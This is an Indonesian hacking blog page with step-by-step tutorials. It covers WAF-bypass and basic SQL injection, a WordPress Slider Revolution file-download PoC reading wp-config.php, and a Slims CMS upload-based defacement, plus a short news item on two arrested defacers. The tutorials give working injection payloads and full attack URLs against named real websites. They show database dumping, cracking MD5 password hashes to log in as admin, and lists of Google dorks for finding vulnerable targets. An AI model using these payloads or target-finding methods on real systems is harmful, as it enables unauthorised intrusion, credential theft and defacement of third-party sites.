Featured Posts

Remote Code Execution Apache Struts2

SQL Injection Bypass WAF

SQL Injection Bypass WAF

 Halo hamker hamker sekalian

Kali ini gw (Rev) bakal share tentang macam macam bypass di sql injection. Sesuai lanjutan materi tentang SQL Injection kita lanjut ke bagian ini.

Setelah kita udah paham tentang basic sql injection, kita terkadang jumpa dengan web yang ngeselin, kayak ketika waktu mengorder by , kadang 403 forbidden, not acceptable dan lain nya. Nah kali ini gw mau bagiin cara membypass WAF di sql injection itu.

WAF atau Web Application Firewall berguna sebagai firewall security web untuk keamanan umum. Jadi, bisa dibilang web yang rata rata udah dipasangin waf itu udah kebal yang namanya dengan sql injection basic atau dengan statement error karakter (') atau (/**).

Oke deh ini dia sedikit macam macam bypass dalam sql injection, kenapa sedikit ?Karena yang banyak kalian bisa lihat di https://pastebin.com/raw/YjxeFagh


{ ORDER BY }

 

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/


[~] UNION select [~]


/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/
/*!50000union*/+/*!50000select*/


Masih banyak sebenernya cuma nanti aja buat post selanjutnya, kalo ini emang bener bener udah bisa baru w post selanjutnya.

Segitu dulu nanti minggu depan w kasi semuanya sama dios diosnya

Sekarang kita bakal coba pada suatu web yang terdapat WAF nya, web nya ialah :
https://intourhotels.com.sa/en/dining.php?id=1

Cara awal inject sama aja kyk yang basic ORDER BY, jadi w gk perlu jelasin lagi tentangORDER BY nya, karena WAF nya gk ada disitu, adanya di UNION jadi langsung ke UNION aja.


https://intourhotels.com.sa/en/dining.php?id=1+order+by+10--+ > Error
https://intourhotels.com.sa/en/dining.php?id=1+order+by+9--+ > Normal
Tau kan harus ambil yg mana

langsung ke Union



Nah pas +union+all+select+1,2,3,4,5,6,7,8,9--+ tampilannya begitu, ini lah salah satu tampilan WAF, kita coba bypass dengan query yg diatas kita ambil salah satu yang /*!50000union*/+/*!50000select*/

jangan lupa taro - sebelum parameter jadi
https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9--+
maka tampilannya kembali normal



 

yess disini kita sudah berhasil membypassnya, lanjut ...
Muncul nomor togel 3 yaudah taro dios disitu, karena ini WAF jadi Diosnya juga WAF, pake DIOS yang kemarin di Basic SQL Injection pasti gk bakal bisa,
Ni w kasi DIOS w :

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

maka BOOM

Ni w kasi Full Query nya takut gk pada paham, pahamin sendiri, atau nanya silahkan...
Nanya aja di Grup ok

https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9--+


mau Dump Database ?
Sama aja kyk biasanya Concat(table_name) . . . +from+colomn_name--+
Berhubung ini WAF maka Concatnya di Bypass juga jadi /*!50000Concat*/(table_name) . . . +from+colomn_name--+

masi gk bisa ? lu berarti ada yg salah w juga bisa
kalo masi lupa liat basic SQL Injection yang pertama w Post

Segitu aja dari w kalo da kesalahan mohon maaf dan tolong dikoreksi, Silahkan diskusi di kolom komentar/di grup.
Thanks

Basic SQL Injection

Basic SQL Injection

 

Assalamualaikum wr wb

Kali ini Materi pertama tentang SQL Injection, kita mulai dengan basicnya terlebih dahulu yaitu SQL yang tidak ada bypass bypassan, jadi ini bisa dibilang easy, yaudah langsung ajalah ...

Topik Pembahasan :

1. Bagaimana cara menemukan celah SQLI

2. Bagaimana cara Menginjeksi SQL

3. Dump Database


Pengertian SQL Injection

Serangan SQL injection atau Injeksi SQLmerupakan teknik serangan injeksi kode yang memanfaatkan celah keamanan yang terjadi pada layer basis data dari sebuah aplikasi.Hal ini terjadi sebagai akibat dari data yang diinputkan oleh pengguna tidak dilakukan validasi dan dimuat di dalam baris perintah query SQL

Yaudah segitu aja pengertiannya cukup langsung ke inti permasalahan

- Bagaimana cara menemukan celah SQLI

cara menemukannya ada bnyk cara, contoh yang paling gampang ialah menggunakan dork apa itu dork ?nanti bakal dibahas di post selanjutnya contoh dork yang umum untuk menemukan celah SQL

inurl:php?id= 

Pada situs web biasa nya ada file php?id=123 kebanyakan bug SQL ini terdapat disitu. cobalah copy dan paster dork tersebut di google maka akan muncul banyak situs web yang menampilkan file atau parameter seperti itu

paramater itu ?id=123

2. Bagaimana cara Menginjeksi SQL

Cara yang paling umum untuk mengetahui apakah website itu vuln SQL atau tidak adalah dengan cara memberikan tanda ' kutip di akhir parameter

Kita ambil contoh dengan menggunakan situs http://www.coda-continuum.com/product/product.php?id=4

taro tanda kutip di akhir parameter menjadi : coda-continuum.com/product/product.php?id=4'

Tanda ' (petik) atau %27 itu sama aja

maka akan menghasilkan tampilan atau tulisan

Database error Invalid SQL SELECT FROM products WHERE id 4 ORDER BY id ASC
MySQL error 1064 You have an error in your SQL syntax  check the manual that corresponds to your MySQL server version for the right syntax to use near  ORDER BY id ASC at line 1

Jika muncul tulisan error seperti ini
maka dipastikan web tersebut Vuln SQL Lanjut ..

Sekarang tahap mencari kolom yaitu dengan query

'+order+by+1--+

harusnya ketika disisipkan order by 1 tampilan website harus kembali seperti semula
apabila masih error tatau masih terdapat tulisan MySQL error coba buang tanda petiknya
jadi querynya begini

+order+by+1--+

Karena tiap tiap website berbeda, jadi ada yang tanda petiknya harus dipake dan ada juga yang tidak.

Selanjutnya masi sama kita masih mencari kolom dengan order by  tapi kita harus mencari angka dimana tampilan halaman website ini menjadi error kembali misal

+order+by+14--+  error

+order+by+13--+ normal

berikut tampilannya

Gambar diatas +order+by+14--+ error 

Gambar diatas +order+by+13--+ normal 

Nah maka di angka 14 error berarti kita ambil angka sebelum error yaitu angka 13

Lanjut

Sekarang tahap UNION dimana ORDER BY diganti, querynya seperti ini

+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Loh kok kenapa sampe 13 ?  karena tadi pada tahap order by itu angka sebelum error ialah angka 13

nah maka unionnya berurutan dari 1 sampai 13

Setelah itu tambahkan tanda - strip disebelum parameter

maka Query lengkapnya seperti ini

coda-continuum.com/product/product.php?id=-4+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Nah setelah itu maka akan muncul angka pada halaman website tersebut

biasanya kita menyebutnya TOGEL berikut tampilannya

Lanjut

Angka togel yang muncul ialah angka 2 5 4

Kita ambil salah satu saja yaitu angka 2

Seletah itu gantikan angka 2 itu dengan dios yang ada dibawah ini

Jadi querynya  +union+all+select+1,(DIOS TARO SINI),3,4,5,6,7,8,9,10,11,12,13--+

Jangan ketik dios tapi diganti sama dios yang ini :

(select(@x)from(select(@x:='Injected By Rev9'),(select(0)from(information_schema.columns)where(table_schema=database())and('-')in(@x:=concat+(@x,'<br>',table_name,'_',column_name))))x)

Tampilannya berbeda karena DIOSnya beda, mau DIOS kyk w ? nanti kita bahas di materi selanjutnya

Tampilan setelah dimasukkan dios maka akan seperti

Nah setelah ini kalian cari tuh table table dan kolom yang menunjukan seperti admin username password setelah itu kalian dupm

Karena di web ini gak ada table username password kita ambil contoh yang kolom

award_c:ID

award_c:Name

award_c:Banner

Maka Querynya adalah  Concat(nama_table)

Dan setelah angka 13 +from+nama_kolom

Masih belum ngerti ?

Ni w kasih aja query lengkapnya biar lu pahamin sendiri ok

http://www.coda-continuum.com/product/product.php?id=-4+union+all+select+1,Concat(ID,0x3a,Name,0x3a,banner),3,4,5,6,7,8,9,10,11,12,13+from+award_c--+

0x3a itu adalah code hex yang hasilnya ialah titik dua

Jadi w pake titik dua buat misahin antara si ID Nama dan Banner nya biar keliatan gk berantakan aja

Berikut tampilan hasil dupm database di table itu

Hasil nya itu yang tulisan warna putih

1:Six:Moons:bluemoonaward.gif

Nah Kalo misal yang lu dump itu username dan password

biasanya passwordnya itu masi dalam ecrypt MD5 dll

Contoh Md5  83f8d50075542714f88814947278440c

lu decrypt dulu password MD5 itu diwebsite penyedia MD5 w biasa di

www.md5decrypt.net

www.hashes.com

Setelah lu udah decrypt dan dapet password yang sebenarnya

barulah lu cari halaman admin login dan masukanlah username dan password yang baru aja lu dump

Demikian dan Terima Kasih

WordPress Slider Revolution 4.1.4 Arbitrary File Download vulnerability

WordPress Slider Revolution 4.1.4 Arbitrary File Download vulnerability

 
 
 
 
######################
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################


#####################
Polisi Menangkap 2 Orang Peretas Situs PN Jakarta Pusat

Polisi Menangkap 2 Orang Peretas Situs PN Jakarta Pusat


Direktorat Siber Bareskrim Polri konpers terkait penangkapan 2 pelaku peretasan situs PN Jakpus di Mabes Polri, Senin (13/1/2020).


DIREKTORAT Siber Bareskrim Mabes Polri menangkap dua orang peretas atau hacker situs sipp.pn-jakartapusat.go.id milik Pengadilan Negeri (PN) Jakarta Pusat. Kedua pelaku berinisial CA alias CAP alias Yusa, 24, dan AY alias KONSLET, 22.
Kasubdit I Direktorat Tindak Pidana Siber Bareskrim Polri, Kombes Reinhard Hutagaol, mengatakan keduanya melalukan aksi peretasan situs PN Jakarta Pusat di Apartemen Green Pramuka, Jakarta Timur pada Kamis (19/12). Aksi tersebut, lanjut Reinhard, diinisasi oleh AY.

"Tersangka AY dengan menggunakan nickname 'KONSLET' diketahui berhasil melakukan defacing atau hacking terhadap 352 situs dalam dan luar negeri," kata Reynhard.

"Kedua tersangka CA dan AY belajar melakukan deface atau hacking secara otodidak. Pendidikan terakhir keduanya adalah lulusan SD dan SMP," ujarnya.

Tangkapan layar saat situs tersebut diretas


Dikutip dari berbagai sumber di internet"
 #KONSLET
Deface Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Deface Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability


Cara Deface Exploit Slims CMS Senayan Arbitary File Upload Vulnerability - Sebenarnya POC ini sudah lama banget dan banget cuman baru kali ini bisa di writeup karena masih banyak kesibuka lain, so langsung aja berikut tutorialnya ...

Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability


#Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter
#Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
#Vendor Homepage : slims.web.id
#Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/
#Date : 28/05/2018
#Affected Version : 5/6/7
#Tested on : Windows / Linux
#Exploit Risk : High
 
Google Dorks:
#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. 
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System. 
                           It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC 

Vuln terdapat disini :
 /admin/modules/bibliography/pop_attach.php
 Contoh: 
www.target.com/senayan/admin/modules/bibliography/pop_attach.php atau
www.target.com/admin/modules/bibliography/pop_attach.php

Lalu ...


 Lalu isi terserah kalian,
Upload file ext: txt,jpg,gif,png


Dan aksesnya ada di : /repository/Rev9.png 


Sekian TerimaKasih :)